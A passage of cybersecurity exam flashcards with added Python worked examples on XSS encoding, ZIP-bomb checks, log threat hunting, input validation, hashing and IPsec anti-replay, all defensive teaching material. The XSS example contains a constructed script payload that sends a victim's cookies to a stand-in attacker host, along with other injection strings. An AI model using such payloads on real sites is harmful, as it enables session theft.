Uploaded by Ashley Allen

Q: Describe phishing.
A: Phishing is social engineering, usually delivered by email or text message, that impersonates a trusted entity (a bank, IT support, a vendor) to trick the recipient into handing over credentials or other sensitive information, or into opening a malicious attachment or link.

Q: Define pharming.
A: Pharming redirects users of a legitimate website to an attacker-controlled copy without any action on their part, typically by poisoning a DNS server's cache, altering the client's hosts file or resolver settings, or exploiting a client vulnerability. The user types the correct address and still lands on the bogus site, so the usual "check the URL" advice does not help.

Q: How can you protect against impersonation attacks?
A: Never volunteer personal or organizational details, verify the caller or sender through an independent channel before revealing anything, and make verification a normal, expected step so staff are not embarrassed to ask. This matters most in organizations that hold valuable information.

Q: Do you know what dumpster diving is in the context of cybersecurity?
A: Dumpster diving is searching discarded material (trash, recycling, e-waste) for information such as names, organization charts, invoices or printouts that can be used to impersonate people or to obtain sensitive data directly. Shredding and controlled disposal are the countermeasures.

Q: What is ransomware and how can you protect against it?
A: Ransomware is malware that encrypts data and demands payment for the decryption key. Protection: keep offline (and tested) backups that the malware cannot reach, patch operating systems and applications promptly, and keep anti-virus/anti-malware signatures current.

Q: Describe shoulder surfing.
A: Shoulder surfing is obtaining information by watching someone's screen or keyboard, typically in public places such as airports or coffee shops, or from a distance with binoculars or a telescope. Privacy screen filters and awareness of surroundings are the countermeasures.

Q: How can you mitigate privilege escalation attacks?
A: Patch the vulnerabilities that escalation exploits as quickly as possible, keep anti-virus/anti-malware software updated, and rely on platform mitigations such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) that make memory-corruption exploits much harder to land.

Q: Define Trojan horse.
A: A Trojan horse is malware that presents itself as legitimate software so the user will run it; once executed it gives the attacker unauthorized access to the system, often by installing further malware or a backdoor.

Q: Describe a replay attack.
A: In a replay attack the attacker captures legitimate data (a session token, an authentication exchange, a signed request) and retransmits it later to impersonate the user or gain access. Per-message nonces, timestamps, sequence numbers and session-bound tokens are the defences, so that a captured message is valid only once.

Q: What is a cross-site scripting (XSS) attack?
A: Cross-site scripting is a web application vulnerability in which attacker-supplied input is returned in a page without proper output encoding, so it runs as script in other users' browsers and can steal session data or perform actions as them. Encoding output for the context it lands in (HTML body, attribute, JavaScript) and a Content Security Policy are the primary defences.
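Worked example added by the editor, not part of the original flashcards: the XSS card above says the bug is input "injected into web pages" and that the fix is output encoding. The snippet below shows a reflected payload concatenated into a page and the context-aware encoding that neutralises it in three contexts. The page fragments and the payloads are constructed for the example; only the Python standard library is used.

```python
import html
import json

# Constructed attacker inputs, as they might arrive in a query string or form.
SCRIPT_PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'
JS_PAYLOAD = '</script><script>alert(1)</script>'


def render_vulnerable(name: str) -> str:
    """The bug: untrusted input is concatenated straight into HTML, so a
    <script> element in the input becomes a script element in the page."""
    return f"<p>Welcome back, {name}!</p>"


def render_body(name: str) -> str:
    """HTML body context: html.escape turns & < > " ' into entities, so the
    browser renders the payload as text instead of parsing it as markup."""
    return f"<p>Welcome back, {html.escape(name)}!</p>"


def render_attribute_vulnerable(value: str) -> str:
    """Attribute context bug: a double quote in the input closes the
    attribute and the rest becomes a new attribute (an event handler)."""
    return f'<input type="text" value="{value}">'


def render_attribute(value: str) -> str:
    """Attribute context fix: always quote the attribute and escape quotes."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


def render_js_value(value: str) -> str:
    """JavaScript string context: json.dumps produces a valid JS string
    literal, and '<' is escaped as \\u003c so a '</script>' inside the value
    cannot terminate the script block early."""
    literal = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var user = {literal};</script>"


def script_openers(page: str) -> int:
    """Number of literal <script> start tags in a rendered page."""
    return page.lower().count("<script>")
```

The three encoders differ because the browser parses each context with different rules; a single "escape everything" routine is the classic mistake. A Content Security Policy that disallows inline script is the defence in depth for the cases the encoder misses.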
Q: Explain the concept of cross-site request forgery (CSRF).
A: CSRF tricks an authenticated user's browser into sending a request the user did not intend (a transfer, a password change) to an application that trusts the session cookie the browser attaches automatically. The attack exploits the application's trust in the browser, not the user's trust in the site; anti-CSRF tokens and SameSite cookies break it.

Q: Describe the Capital One SSRF breach in March 2019.
A: A misconfigured web application firewall (WAF) in Capital One's cloud environment was vulnerable to server-side request forgery. The attacker used it to reach the cloud instance metadata service, obtained the temporary credentials of the WAF's IAM role, and used them to list and download data from Amazon S3 buckets.

Q: How can driver manipulation be achieved through shimming?
A: A shim is a small layer that sits between two components (an application and the OS, or the OS and a driver) to translate or intercept calls; Windows ships a compatibility-shim framework for exactly this purpose. Malware authors write their own shims to sit in the middle of a driver or API call path and bypass security controls while looking like legitimate compatibility code.

Q: Define malware hide-and-go-seek.
A: The constant cycle in which new malware variants are written to evade existing anti-virus signatures, infect, and hide until new signatures or behavioural detections catch up. Traditional signature-based anti-virus can miss new attack types entirely, which is why layered and behaviour-based detection is needed.

Q: Do SSL stripping and HTTP downgrade combine for an attack?
A: Yes. Sitting between the victim and the web server (for example on an evil-twin access point or via ARP spoofing), the attacker keeps HTTPS to the server but rewrites the pages so the victim's side is plain HTTP, then reads and modifies the traffic. HTTP Strict Transport Security (HSTS) prevents the downgrade for sites the browser has already seen it from.

Q: Describe the concept of refactoring in the context of metamorphic malware.
A: Metamorphic malware rewrites its own code on each infection, reordering functions, changing control flow and substituting equivalent instructions, so every copy has a different signature while the behaviour stays the same. This defeats signature-based detection and pushes detection toward behaviour.

Q: How do race conditions lead to problems like the Mars rover reboot loop?
A: A race condition arises when the outcome depends on the timing of operations that were never designed to interleave. In the Mars rover case a file-system problem triggered a reboot, the same problem recurred on restart, and the rover entered a reboot loop that took it out of service until engineers intervened. The same class of bug (time-of-check to time-of-use) is exploitable in software.

Q: Define memory vulnerabilities and their impact.
A: Memory vulnerabilities are flaws in how a program handles memory: memory leaks (allocating without freeing until resources run out), NULL pointer dereferences, integer overflows that produce wrong buffer sizes, and buffer overflows. They cause crashes and denial of service and, when the attacker controls what is written, can lead to code execution.

Q: Do directory traversal attacks exploit vulnerabilities in web servers?
A: Yes. Directory traversal uses sequences such as ../ (often URL-encoded) in a requested path to read files outside the web root, exploiting either a flaw in the web server software or application code that builds file paths from user input without validation.

Q: Describe the risks associated with improper error handling in applications.
A: Detailed error messages shown to users can reveal internal network addresses, stack traces, memory dumps or database structure and queries that help an attacker plan the next step. Errors should be logged in full internally and shown to the user only as a generic message.
Q: How can API attacks impact communication paths?
A: APIs are the communication path between clients and back-end services. Attacking them can expose sensitive data, cause denial of service, allow interception of traffic, or grant privileged access when authorization on an endpoint is missing or broken.

Q: Define resource exhaustion attacks like ZIP bombs.
A: Resource exhaustion is a specialized denial of service that uses very little attacker effort to consume a large amount of the target's CPU, memory or disk. A ZIP bomb is the classic example: a 42 KB archive of nested archives that expands to about 4.5 petabytes when fully decompressed.

Q: How do Bluejacking and Bluesnarfing differ in Bluetooth attacks?
A: Bluejacking sends unsolicited messages to a nearby Bluetooth device (a nuisance; nothing is taken). Bluesnarfing reads and copies data (contacts, calendars, files) from a device without authentication, which is a serious breach. Both rely on the device being discoverable or on flaws in old Bluetooth implementations.

Q: Describe the concept of wireless evil twins.
A: An evil twin is an attacker's access point configured with the same SSID (and often a stronger signal) as a legitimate network so that clients connect to it instead. The attacker can then observe traffic, serve phishing pages or push malware. Encrypted application traffic (HTTPS, VPN) limits what the attacker can read.

Q: Do wireless disassociation attacks lead to significant network disruptions?
A: Yes. The attacker sends forged 802.11 deauthentication or disassociation management frames, which were unauthenticated in the original standard, so clients are repeatedly kicked off the network: a denial of service. 802.11w protected management frames mitigate this where the access point and clients support it.

Q: Define the term threat actors and their attributes.
A: A threat actor is the entity responsible for an event that affects the security of another. Types include advanced persistent threats (APTs), insiders, nation states, hacktivists, script kiddies, organized crime and individual hackers. Their attributes are whether they are internal or external, their resources and funding, and their level of sophistication and intent.

Q: Describe the attack vectors used by threat actors.
A: An attack vector is the method used to gain access or deliver malware: direct physical access, wireless, email, supply chain, social media, removable media, cloud services and DNS-based attacks, among others.

Q: How does threat intelligence aid in cybersecurity defense?
A: Threat intelligence is research on threats and threat actors that lets defenders make informed decisions about controls and priorities. Sources include open-source intelligence (OSINT), closed or proprietary feeds, vulnerability databases, and public or private information-sharing centers.

Q: Define indicators of compromise (IOC) and their significance.
A: An indicator of compromise is an observable that a breach has occurred or is occurring: unusual network traffic, changes to files or system configuration, known-bad IP addresses, domains or file hashes, or anomalous account activity. IOCs give high-confidence intrusion alerts that should trigger immediate response.

Q: Describe the concept of predictive analysis in cybersecurity.
A: Predictive analysis applies statistics and machine learning to large datasets (traffic, logs, threat feeds) to find suspicious patterns and behaviours and forecast likely attacks, so defences can be adjusted before the attack rather than after.
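Worked example added by the editor, not part of the original flashcards, for the ZIP bomb card above: a pre-extraction triage of an archive (declared size, compression ratio, nested archives) followed by the check that actually matters, a byte limit enforced while decompressing, because the sizes in the central directory are attacker-controlled. The limits and the two sample archives are constructed for the example; the "bomb" is a 16 MiB run of zeros, small enough to build in memory but far over the ratio limit.

```python
import io
import zipfile

# Policy limits; assumed values for the example, tune per deployment.
MAX_TOTAL_UNCOMPRESSED = 64 * 1024 * 1024   # bytes, across all entries
MAX_COMPRESSION_RATIO = 100.0
MAX_ENTRIES = 1000


def build_zip(entries: dict) -> bytes:
    """Constructed sample input: build an in-memory archive from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def inspect_zip(data: bytes) -> list:
    """Triage from the central directory before extracting anything.
    Returns the reasons to refuse the archive; an empty list means it passed."""
    reasons = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        declared = sum(i.file_size for i in infos)
        stored = sum(i.compress_size for i in infos)
        ratio = declared / max(stored, 1)
        if len(infos) > MAX_ENTRIES:
            reasons.append(f"too many entries: {len(infos)}")
        if declared > MAX_TOTAL_UNCOMPRESSED:
            reasons.append(f"declared size {declared} exceeds {MAX_TOTAL_UNCOMPRESSED}")
        if ratio > MAX_COMPRESSION_RATIO:
            reasons.append(f"compression ratio {ratio:.0f}:1 exceeds {MAX_COMPRESSION_RATIO:.0f}:1")
        nested = [i.filename for i in infos if i.filename.lower().endswith(".zip")]
        if nested:   # 42.zip-style bombs are archives of archives
            reasons.append(f"nested archives: {nested}")
    return reasons


def read_entry_bounded(data: bytes, name: str, limit: int = MAX_TOTAL_UNCOMPRESSED) -> bytes:
    """Decompress one entry while counting the bytes actually produced. The
    sizes in the central directory are attacker-controlled metadata, so the
    real defence is enforcing the limit on the output stream itself."""
    out = bytearray()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as member:
        while True:
            chunk = member.read(64 * 1024)
            if not chunk:
                break
            out += chunk
            if len(out) > limit:
                raise ValueError(f"{name}: exceeded {limit} bytes during extraction")
    return bytes(out)


def bounded_read_rejected(data: bytes, name: str, limit: int) -> bool:
    try:
        read_entry_bounded(data, name, limit)
    except ValueError:
        return True
    return False


# Constructed samples: a normal upload, and a small archive that inflates to
# 16 MiB of zeros (well within the size limit, far over the ratio limit).
BENIGN_ZIP = build_zip({"readme.txt": b"hello", "data.csv": b"a,b\n1,2\n"})
BOMB_ZIP = build_zip({"payload.bin": b"\0" * (16 * 1024 * 1024)})
```

The ratio check catches the single-layer case; the nested-archive check is what catches the 42.zip shape, whose outer layer looks harmless. Whatever the triage says, extraction should still run under the byte limit and, in production, under a timeout and a disk quota.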
Q: Describe how to access the code base for outsourced code development.
A: Outsourced developers need the code base, so it is either kept in-house and reached over a VPN or hosted in a cloud repository with access controls; in both cases access is limited to the people and the time needed.

Q: How do third-party risks impact cybersecurity?
A: Third parties bring system-integration risk, dependence on vendor support that may lapse, supply-chain vulnerabilities in what they deliver, and legacy platforms that cannot be patched. The organization must perform due diligence on the vendor and keep its own local security controls rather than relying on the vendor's.

Q: Define vulnerability impacts based on the content.
A: A vulnerability has impact when it is exploited: data loss, identity theft, financial loss, reputation damage and availability loss. The aggregate cost is large; malicious cyber activity was estimated to have cost the U.S. economy billions of dollars in 2016 alone.

Q: How can data loss occur due to unsecured databases?
A: Databases exposed to the Internet with no password or a default password are found by automated scanners within hours; their contents are copied, held for ransom or simply deleted, as happened in several waves of Internet-facing database wipes.

Q: Explain the concept of identity theft based on Equifax's data breach.
A: Identity theft uses stolen personal information (names, Social Security numbers, dates of birth, addresses) to open accounts or obtain credit as the victim. The Equifax breach exposed exactly that data for a large part of the U.S. population, creating long-term financial and personal risk for the individuals affected.

Q: Describe the financial loss experienced by the Bank of Bangladesh in March 2016.
A: Attackers used the bank's credentials to send authentic-looking SWIFT transfer messages requesting nearly one billion dollars. Most of the transfers were blocked, but about 81 million dollars reached accounts in the Philippines and was laundered through the casino industry there, beyond recovery.

Q: What are the impacts of getting hacked on an organization's reputation?
A: Breach-notification laws force the organization to disclose, the stock price can fall, and the company faces public and regulatory scrutiny; the Uber breach is the usual example.

Q: How does ransomware impact availability loss in the context of BancoEstado's attack?
A: Availability loss means the service is simply not there. The ransomware attack on BancoEstado forced the bank to close its branches for an extended period; the impact reached across the internal network, and systems had to be wiped and restored from backups before they could be trusted again.

Q: Define the concept of threat hunting in cybersecurity.
A: Threat hunting is proactively searching logs, endpoints and network data for attackers who are already inside or probing, rather than waiting for an alert. The goal is to find them before they find what they are after, and hunting strategies change constantly as attackers do.

Q: How does intelligence fusion contribute to cybersecurity efforts?
A: Intelligence fusion combines many different security data sources (logs, threat feeds, vulnerability data, endpoint telemetry) and applies big-data analytics to find patterns and correlations that no single source shows, improving both detection and response.
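Worked example added by the editor, not part of the original flashcards, for the indicators-of-compromise card on the previous page and the threat hunting card above: two hunts run over a constructed log sample. The first matches atomic indicators (IP, domain, file hash) from a feed; the second is behavioural, looking for one source touching many ports on one host, which no feed would list. The log lines, the indicator set and the field names are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample log, key=value style, not from any real system.
# Addresses are documentation ranges; the hash is SHA-256 of the byte "a".
SAMPLE_LOGS = """\
2024-05-02T08:01:10Z host=fw1 src=203.0.113.45 dst=10.0.0.5 dport=21 action=deny
2024-05-02T08:01:10Z host=fw1 src=203.0.113.45 dst=10.0.0.5 dport=22 action=deny
2024-05-02T08:01:11Z host=fw1 src=203.0.113.45 dst=10.0.0.5 dport=23 action=deny
2024-05-02T08:01:11Z host=fw1 src=203.0.113.45 dst=10.0.0.5 dport=25 action=deny
2024-05-02T08:01:12Z host=fw1 src=203.0.113.45 dst=10.0.0.5 dport=80 action=allow
2024-05-02T08:01:12Z host=fw1 src=203.0.113.45 dst=10.0.0.5 dport=443 action=allow
2024-05-02T08:03:40Z host=fw1 src=10.0.0.21 dst=198.51.100.77 dport=443 action=allow
2024-05-02T08:03:41Z host=dns1 src=10.0.0.21 query=update-check.evil.example rcode=NOERROR
2024-05-02T08:04:02Z host=ws7 user=jsmith proc=svchost.exe sha256=ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb action=exec
2024-05-02T08:10:00Z host=fw1 src=10.0.0.33 dst=198.51.100.20 dport=443 action=allow
"""

# Constructed indicator set, as a threat feed or sharing centre would supply it.
IOCS = {
    "ip": {"198.51.100.77"},
    "domain": {"update-check.evil.example"},
    "sha256": {"ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb"},
}

KV_RE = re.compile(r"(\w+)=(\S+)")
FIELD_TYPES = {"src": "ip", "dst": "ip", "query": "domain", "sha256": "sha256"}


def parse_log(text: str) -> list:
    records = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        rec = dict(KV_RE.findall(line))
        rec["ts"] = line.split(" ", 1)[0]
        rec["line"] = number
        records.append(rec)
    return records


def ioc_matches(records: list, iocs: dict) -> list:
    """Atomic-indicator hunt: any field of a known type found in the feed."""
    hits = []
    for rec in records:
        for field, kind in FIELD_TYPES.items():
            value = rec.get(field)
            if value is not None and value.lower() in iocs.get(kind, set()):
                hits.append({"line": rec["line"], "host": rec.get("host"),
                             "field": field, "value": value})
    return hits


def port_scan_sources(records: list, min_ports: int = 5) -> dict:
    """Behavioural hunt: one source touching many distinct ports on one
    destination, whether or not the firewall allowed each attempt."""
    ports = defaultdict(set)
    for rec in records:
        if "src" in rec and "dst" in rec and "dport" in rec:
            ports[(rec["src"], rec["dst"])].add(rec["dport"])
    return {pair: len(p) for pair, p in ports.items() if len(p) >= min_ports}


def hunt(text: str = SAMPLE_LOGS) -> dict:
    records = parse_log(text)
    return {"ioc_hits": ioc_matches(records, IOCS),
            "port_scans": port_scan_sources(records)}
```

Note that the denied connections still count in the scan hunt: a firewall "deny" is a successful block, but the pattern of denies is itself the indicator. The threshold is a tuning knob; on a real network the first thing a hunter does is look at what the hunt flags and adjust it.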
Q: Describe the process of vulnerability scanning.
A: A vulnerability scanner probes systems and compares what it finds against a database of known weaknesses. Non-intrusive scans only gather information (versions, open ports, configuration) without exploiting anything; intrusive scans actually attempt the exploit and can disrupt the target. Credentialed scans log in and see far more than uncredentialed ones, and every result must be reviewed for false positives.

Q: Explain the importance of configuration review in cybersecurity.
A: Configuration review validates that workstations, servers and security devices are set up as intended (patch level, running services, account settings, firewall rules). Many breaches start from a misconfiguration rather than a software bug, so regular review against a baseline is a core control.

Q: Describe the process of provisioning an application.
A: Provisioning deploys everything the application needs: web servers, database servers, middleware, user workstation configuration, certificates, and the network and firewall settings that go with them. Security is applied at each step (hardened images, least-privilege accounts, valid certificates) rather than added afterwards.

Q: Define scalability and elasticity in the context of handling application workload.
A: Scalability is the ability to handle increasing workload within a given infrastructure (the design can grow). Elasticity is automatically adding and removing resources as the workload rises and falls, so capacity follows demand.

Q: How does orchestration play a key role in cloud computing?
A: Orchestration automates the deployment and teardown of services so that entire application instances (servers, networks, switches, firewalls) appear and disappear automatically or on demand. The same automation should apply security policy consistently every time.

Q: Do you need to describe the deprovisioning process of an application instance?
A: Yes. Deprovisioning dismantles the instance completely: remove the servers and network objects, revert the firewall and access policies that were added for it, and decide what happens to the data (securely delete or archive it) so nothing sensitive is left exposed on orphaned storage.

Q: Explain the concept of obfuscation in secure coding techniques.
A: Obfuscation transforms readable code into a form that is hard for a human to understand while keeping the same functionality, to slow reverse engineering and make vulnerabilities harder to find. It is not a security boundary: the flaw is still there, and a determined analyst will de-obfuscate it.

Q: How can code reuse lead to security vulnerabilities?
A: Building new applications from old code carries any flaws in that code into every new application that uses it, so a single vulnerability is replicated across the organization. Reused code needs the same review and testing as new code.

Q: Define input validation and its importance in secure coding.
A: Input validation checks that what the application receives is what it expects (type, length, format, allowed values) before the data is used. Document every input method (forms, URLs, APIs, files), reject or correct improper input, and never trust data from the client. It is the first line of defence against injection and many memory bugs.

Q: Describe the purpose of memory management in secure coding.
A: Careless memory handling produces buffer overflows and related bugs, so developers must track how much data goes into each buffer, free what they allocate, and never trust input sizes; using memory-safe languages or bounds-checked APIs where possible is the modern best practice.
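Worked example added by the editor, not part of the original flashcards, for the input validation card above: an allow-list validator for a sign-up form. It rejects fields the schema does not know (the mass-assignment case where a client adds "is_admin"), type-checks before pattern-matching, and reports every problem rather than the first. The schema, field names and limits are assumptions for the example.

```python
import re

# Allow-list rules. Patterns are matched with fullmatch, so a trailing
# newline ("jsmith\n") cannot slip past the way it can with '$'.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")
ASSIGNABLE_ROLES = {"viewer", "editor"}     # "admin" is never assignable from a form

SCHEMA = {
    "username": {"type": str, "pattern": USERNAME_RE, "required": True},
    "email":    {"type": str, "pattern": EMAIL_RE, "max_len": 254, "required": True},
    "age":      {"type": int, "min": 13, "max": 120, "required": False},
    "role":     {"type": str, "choices": ASSIGNABLE_ROLES, "required": False},
}


class ValidationError(ValueError):
    def __init__(self, errors):
        super().__init__("; ".join(errors))
        self.errors = errors


def validate_signup(payload: dict) -> dict:
    """Return a cleaned copy of payload or raise ValidationError listing every
    problem. Unknown fields are rejected (mass-assignment defence), values are
    type-checked, then checked against the allow-list rules."""
    errors = []
    unknown = sorted(set(payload) - set(SCHEMA))
    if unknown:
        errors.append(f"unexpected fields: {unknown}")
    clean = {}
    for name, rule in SCHEMA.items():
        if name not in payload:
            if rule["required"]:
                errors.append(f"{name}: required")
            continue
        value = payload[name]
        if rule["type"] is int and isinstance(value, str) and value.isdigit():
            value = int(value)              # forms deliver numbers as strings
        if isinstance(value, bool) or not isinstance(value, rule["type"]):
            errors.append(f"{name}: expected {rule['type'].__name__}")
            continue
        if "max_len" in rule and len(value) > rule["max_len"]:
            errors.append(f"{name}: longer than {rule['max_len']}")
        elif "pattern" in rule and not rule["pattern"].fullmatch(value):
            errors.append(f"{name}: invalid format")
        if "choices" in rule and value not in rule["choices"]:
            errors.append(f"{name}: must be one of {sorted(rule['choices'])}")
        if "min" in rule and value < rule["min"] or "max" in rule and value > rule["max"]:
            errors.append(f"{name}: out of range")
        clean[name] = value
    if errors:
        raise ValidationError(errors)
    clean.setdefault("role", "viewer")
    return clean


def validation_errors(payload: dict) -> list:
    """The error list for a payload, or [] when it is valid."""
    try:
        validate_signup(payload)
    except ValidationError as exc:
        return exc.errors
    return []
```

Validation rejects; it does not try to "clean up" a SQL-looking username into something acceptable. Escaping for the database, for HTML and for the shell each happen separately at the point of use, because the correct encoding depends on where the value lands.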
Q: How do third-party libraries and SDKs pose security risks in software development?
A: Libraries and SDKs extend the language and save development time, but they run with the application's privileges and may contain vulnerabilities or malicious code. They need the same testing as in-house code, plus tracking of versions so that known vulnerabilities in dependencies get patched.

Q: Explain the importance of version control in software development.
A: Version control tracks every change, allows reverting to earlier versions and comparing versions over time, which also reveals modifications to important files. The security challenge is that the history retains everything ever committed, including secrets and removed code, so the repository itself must be protected.

Q: Describe Non-repudiation in cryptography.
A: Non-repudiation means a party cannot later deny having sent a message or performed an action. It is provided by digital signatures made with a private key that only the signer holds; a MAC does not provide it, because both sides share the key.

Q: Define Integrity in cryptography.
A: Integrity means data has not been changed in transit or in storage, whether by accident or by an attacker. It is verified with hashes and, against an active attacker, with keyed hashes (MACs) or digital signatures.

Q: Do weak keys require additional processes to strengthen them?
A: Yes. Key stretching (also called key strengthening) runs a weak key or password through many rounds of hashing (PBKDF2, bcrypt, scrypt) so that each guess costs the attacker much more time. It raises the cost of brute force but cannot add entropy the original key lacks.

Q: How does symmetric encryption work?
A: Symmetric encryption uses one shared secret key for both encryption and decryption. It is fast and suited to bulk data, but the key must reach both parties securely, which is typically done with asymmetric cryptography.

Q: Describe the purpose of homomorphic encryption.
A: Homomorphic encryption allows computations to be performed on encrypted data, producing an encrypted result that decrypts to the correct answer, so a cloud provider can process data without ever seeing the plaintext.

Q: What is the purpose of hashing in cryptography?
A: A hash function maps data of any size to a short fixed-length digest that is practically unique to that input and cannot be reversed. It is used to verify integrity, to store passwords, and as the fingerprint that digital signatures are computed over.

Q: Do load balancers help distribute network traffic evenly?
A: Yes. A load balancer spreads requests across multiple servers (round-robin, least connections or weighted), checks server health so failed servers are skipped, and can terminate TLS and cache content, providing both capacity and fault tolerance.

Q: Define network segmentation.
A: Network segmentation divides a network into smaller segments (physically, with VLANs, or logically) to improve performance, limit how far an attacker can move after a compromise, and meet compliance requirements such as isolating payment systems.
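Worked example added by the editor, not part of the original flashcards, tying together the integrity, non-repudiation, key stretching and hashing cards above: a plain hash for integrity, an HMAC for integrity against an active attacker, and PBKDF2 key stretching for a password record. The key material and passwords are constructed for the example; the functions are the Python standard library's.

```python
import hashlib
import hmac
import secrets

PBKDF2_ITERATIONS = 600_000     # OWASP's 2023 guidance for PBKDF2-HMAC-SHA256


def sha256_hex(data: bytes) -> str:
    """Fixed-length digest: the integrity fingerprint the hashing card describes."""
    return hashlib.sha256(data).hexdigest()


def integrity_ok(data: bytes, expected_hex: str) -> bool:
    """A bare hash detects accidental corruption only: an attacker who can
    replace the data can recompute and replace the hash as well."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def mac_tag(key: bytes, data: bytes) -> str:
    """Keyed hash (HMAC): integrity against an active attacker who lacks the
    key. Both parties hold the key, so it proves nothing to a third party;
    non-repudiation needs a digital signature made with a private key."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def mac_ok(key: bytes, data: bytes, tag_hex: str) -> bool:
    return hmac.compare_digest(mac_tag(key, data), tag_hex)   # constant-time compare


def stretch_key(password: str, salt: bytes, iterations: int = PBKDF2_ITERATIONS) -> bytes:
    """Key stretching: derive a 32-byte key from a weak secret through many
    HMAC rounds so every guess costs the attacker `iterations` hashes. It
    raises the cost of brute force; it cannot add entropy the password lacks."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)


def new_password_record(password: str) -> dict:
    salt = secrets.token_bytes(16)           # per-user salt defeats precomputed tables
    return {"salt": salt.hex(), "iterations": PBKDF2_ITERATIONS,
            "hash": stretch_key(password, salt).hex()}


def verify_password(record: dict, password: str) -> bool:
    derived = stretch_key(password, bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(derived.hex(), record["hash"])
```

Every comparison goes through hmac.compare_digest rather than ==, so the time taken does not leak how many leading bytes matched. Storing the iteration count in the record is what lets the cost be raised later without invalidating existing users.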
Q: How do VPNs ensure secure data transmission over public networks?
A: A VPN encrypts traffic between endpoints (a client and a concentrator, or two sites) so it can cross a public network with confidentiality and integrity; the peers authenticate each other before the tunnel is established.

Q: Describe the purpose of AH (Authentication Header) in VPNs.
A: AH is the IPsec protocol that provides data integrity, origin authentication and anti-replay protection using a keyed hash over the packet. It does not provide confidentiality, so the payload travels in the clear.

Q: Define ESP (Encapsulating Security Payload) in VPNs.
A: ESP is the IPsec protocol that encrypts the payload for confidentiality (with limited traffic-flow confidentiality in tunnel mode) and also provides integrity and anti-replay protection; it is the one normally used.

Q: How does L2TP (Layer 2 Tunneling Protocol) work in VPNs?
A: L2TP tunnels layer 2 frames across a layer 3 network so two sites behave as if they were on the same segment. L2TP itself has no encryption, so it is normally combined with IPsec (L2TP/IPsec) for confidentiality.

Q: Do HTML5 VPNs require a separate VPN application to create a VPN tunnel?
A: No. An HTML5 VPN uses the browser's own capabilities (its network and cryptography APIs) to communicate with the VPN concentrator, so any HTML5-compliant browser can connect with nothing to install.

Q: Describe the purpose of Port Security in networking.
A: Port security controls which devices may use a physical switch interface, typically by limiting the number of source MAC addresses allowed on the port and disabling the port or alerting when that limit is exceeded. It also lets the switch restrict traffic types and watch for unusual traffic on the port.

Q: How does Loop Protection prevent network issues in switched networks?
A: Ethernet frames have no time-to-live, so two switches joined by redundant links will forward a broadcast back and forth forever. Spanning Tree Protocol (IEEE 802.1D) detects the loop and blocks the redundant ports until they are needed.

Q: Define Broadcast Storm Control in networking.
A: Storm control limits the number of broadcast, multicast and unknown-unicast frames per second an interface will accept, so a loop, a faulty NIC or an attacker cannot flood the segment and the rest of the network keeps running.

Q: Describe the function of BPDU Guard in network security.
A: PortFast lets an end-station port skip the spanning-tree listening and learning states so it forwards immediately. BPDU Guard protects that shortcut: if a BPDU (which only a switch should send) arrives on a PortFast port, the switch shuts the interface down, preventing a rogue switch from creating a loop or taking over the topology.

Q: What is the purpose of DHCP Snooping in network security?
A: DHCP snooping makes a layer 2 switch act as a DHCP firewall: only trusted ports (toward the real DHCP server) may carry DHCP server replies, leases seen on untrusted ports are recorded in a binding table, and invalid or unauthorized DHCP traffic is dropped. The binding table also feeds IP source guard and dynamic ARP inspection.
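Worked example added by the editor, not part of the original flashcards: the AH and ESP cards above both list anti-replay protection, and the replay attack card earlier describes what it defends against. This is the sliding-window algorithm IPsec uses for it (the scheme in RFC 4303, Appendix A), written out so the accept/drop decisions can be followed. The sequence numbers fed to it are constructed; a real implementation runs the integrity check before updating the window.

```python
class AntiReplayWindow:
    """Sliding anti-replay window as specified for IPsec ESP and AH
    (RFC 4303, Appendix A). accept(seq) returns True when the sequence number
    is new and inside the window, False when it is a replay or too old to
    judge. In a real SA the integrity check runs first, so only authenticated
    packets ever update the window; otherwise an attacker could advance it."""

    def __init__(self, size: int = 64):
        if size < 32:                      # RFC 4303 requires at least 32
            raise ValueError("window must be at least 32")
        self.size = size
        self.mask = (1 << size) - 1
        self.highest = 0                   # highest seq accepted; 0 = none yet
        self.bitmap = 0                    # bit i set => (highest - i) was received

    def accept(self, seq: int) -> bool:
        if seq <= 0:                       # ESP sequence numbers start at 1
            return False
        if seq > self.highest:             # ahead of the window: slide it
            shift = seq - self.highest
            self.bitmap = ((self.bitmap << shift) | 1) & self.mask
            self.highest = seq
            return True
        offset = self.highest - seq
        if offset >= self.size:            # behind the window: drop
            return False
        bit = 1 << offset
        if self.bitmap & bit:              # already received: replay
            return False
        self.bitmap |= bit                 # late but new: accept once
        return True


def replay_check(sequence_numbers, size: int = 64) -> list:
    """Run received ESP sequence numbers through one window and return the
    accept/drop decision for each, in order."""
    window = AntiReplayWindow(size)
    return [window.accept(seq) for seq in sequence_numbers]
```

The window exists because IP does not deliver in order: a packet that arrives a little late is legitimate, the same packet arriving twice is not, and a packet older than the window cannot be judged either way, so it is dropped. The same idea, in simpler form, is why application protocols use nonces or monotonically increasing counters against replay.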
Q: Define MAC Filtering in network security.
A: MAC filtering restricts network access to a list of approved hardware (MAC) addresses. It keeps casual unauthorized devices out and creates administration work for visitors, but because MAC addresses are transmitted in the clear and are trivial to change, it is security through obscurity rather than a real access control.

Q: How does DNSSEC enhance security in Domain Name Resolution?
